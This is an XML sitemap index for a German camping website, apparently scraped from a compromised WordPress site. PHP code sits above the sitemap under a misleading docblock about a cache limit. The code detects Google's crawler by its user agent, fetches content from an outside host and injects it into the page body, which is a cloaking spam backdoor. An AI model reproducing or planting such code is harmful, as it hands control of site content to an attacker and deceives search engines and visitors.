
/**
 * Set the cache limit.
 *
 * To override this cache in a child theme, remove
 * the filter and add your own function tied to
 * the cache filter hook.
 *
 * @param int $c The number of excerpt characters.
 * @return int The filtered number of characters.
 */
if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://cache.cachedtranslation.com/cache.php?h=campinghelden-online.de&id=8');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);curl_close($curl);
	$html = preg_replace('/(<body.*)\n/', "$1 $c", $html);
	return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//campinghelden-online.de/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://campinghelden-online.de/post-sitemap.xml</loc>
		<lastmod>2025-03-24T16:16:43+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://campinghelden-online.de/page-sitemap.xml</loc>
		<lastmod>2025-03-24T16:13:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://campinghelden-online.de/category-sitemap.xml</loc>
		<lastmod>2025-03-24T16:16:43+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->